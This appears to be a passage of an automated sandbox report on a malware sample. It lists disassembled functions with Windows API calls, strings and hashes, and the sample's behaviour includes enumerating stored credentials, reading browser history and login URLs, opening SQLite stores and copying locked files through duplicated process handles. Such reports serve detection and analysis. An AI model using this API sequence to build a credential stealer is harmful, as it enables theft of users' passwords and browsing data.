                                                                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                • API String ID: 912665193-1740548384
                                                                                • Opcode ID: f63cd266dcb09be918ed3c8166e02b456984568ad5bfffb73486f14a8e63b552
                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                • Opcode Fuzzy Hash: f63cd266dcb09be918ed3c8166e02b456984568ad5bfffb73486f14a8e63b552
                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E01E, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                • String ID: bhv
                                                                                • API String ID: 3399910952-2689659898
                                                                                • Opcode ID: 31268b28b02b0f0f5ddb4f3c3498909315dc08a91966dbcc90a29e268abf3bd7
                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                • Opcode Fuzzy Hash: 31268b28b02b0f0f5ddb4f3c3498909315dc08a91966dbcc90a29e268abf3bd7
                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E01E, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNEL32(?,?,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,?), ref: 0040E113
                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040E12E
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileHandle$Close$ProcessView$CreateCurrentDuplicateMappingOpenSizeUnmapWrite
                                                                                • String ID: bhv
                                                                                • API String ID: 113222983-2689659898
                                                                                • Opcode ID: 9c064af638777ba197a56366dbae1424145abf22db58465ac98cc49ba754cd79
                                                                                • Instruction ID: 29ca0cb54317fdb83c25398b6d75e032628821043b7a795c20d56c4fb62cc3c3
                                                                                • Opcode Fuzzy Hash: 9c064af638777ba197a56366dbae1424145abf22db58465ac98cc49ba754cd79
                                                                                • Instruction Fuzzy Hash: 1F413776800128FBCF119FA6CC889DFBFB9FF09750F10846AF904A6250D7749A50CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413F4F, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2941347001-70141382
                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C274, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                • String ID: visited:
                                                                                • API String ID: 2470578098-1702587658
                                                                                • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0047633C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: _initterm$HandleModule__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                                                                • String ID: hlD
                                                                                • API String ID: 301052401-1768098791
                                                                                • Opcode ID: 5942991171f564ac91b64b0abba7f0b92a8e384bf0821f261ae98ab9b20f5b5e
                                                                                • Instruction ID: dc173567fb86274fb00091e4d1e76771e4e06db7bcc81c267b596439e00d2fe2
                                                                                • Opcode Fuzzy Hash: 5942991171f564ac91b64b0abba7f0b92a8e384bf0821f261ae98ab9b20f5b5e
                                                                                • Instruction Fuzzy Hash: 0A31D174940304EFEB15AF65DC599A93BB0FB0A725B21426BF811A32A1D77C9881CF1F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B58D, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                • String ID: AE$BIN
                                                                                • API String ID: 1668488027-3931574542
                                                                                • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041837F, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 166fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • CreateFileA.KERNEL32(?,?,00000003,00000000,?,?,00000000), ref: 0041846F
                                                                                • GetLastError.KERNEL32(0040EAB3), ref: 0041847E
                                                                                Strings
                                                                                • cannot detach database %s, xrefs: 0042F939
                                                                                • no such database: %s, xrefs: 0042F92A
                                                                                • database %s is locked, xrefs: 0042F987
                                                                                • cannot DETACH database within transaction, xrefs: 0042F946
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFile$ErrorLast
                                                                                • String ID: cannot DETACH database within transaction$cannot detach database %s$database %s is locked$no such database: %s
                                                                                • API String ID: 3733516855-3374617522
                                                                                • Opcode ID: d9ae44f733c888053b395d7dc68adab77d22d82cc61184552de63609fc4af6a4
                                                                                • Instruction ID: ca6f35ae88b7cc20ad94e0f237872654302f60ab57a146f263e711f097441c5f
                                                                                • Opcode Fuzzy Hash: d9ae44f733c888053b395d7dc68adab77d22d82cc61184552de63609fc4af6a4
                                                                                • Instruction Fuzzy Hash: AD510171604301AFEB10CF64DC81B5AB7F5AB44318F94893EF89593291DB78DD88CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BB98, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                • String ID:
                                                                                • API String ID: 509814883-3916222277
                                                                                • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041837F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFile$??3@ErrorLast
                                                                                • String ID: |A
                                                                                • API String ID: 1407640353-1717621600
                                                                                • Opcode ID: 65f9c72f440886fdfd855f54d1148d260d82dbf2ddc620685dd815aadd4aa234
                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                • Opcode Fuzzy Hash: 65f9c72f440886fdfd855f54d1148d260d82dbf2ddc620685dd815aadd4aa234
                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412465, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                • String ID: r!A
                                                                                • API String ID: 2791114272-628097481
                                                                                • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C768, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                • API String ID: 62308376-4196376884
                                                                                • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A804, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040A824
                                                                                • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID: C:\Windows\system32
                                                                                • API String ID: 669240632-2896066436
                                                                                • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BDB0, Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                • memcpy.MSVCRT ref: 0040BEB2
                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                • String ID:
                                                                                • API String ID: 3191383707-0
                                                                                • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041F1A5, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: #@B$@ $JRA$JRA$SQLite format 3
                                                                                • API String ID: 1475443563-938593540
                                                                                • Opcode ID: 4b916cbbc89a2321bc65a90fe44e1004a538d968f20119a17c3d59cf1106350c
                                                                                • Instruction ID: dd564f3834e5fd7f915bb1549ea4e2c5e4df23822d934551e6148821a7b6c6fa
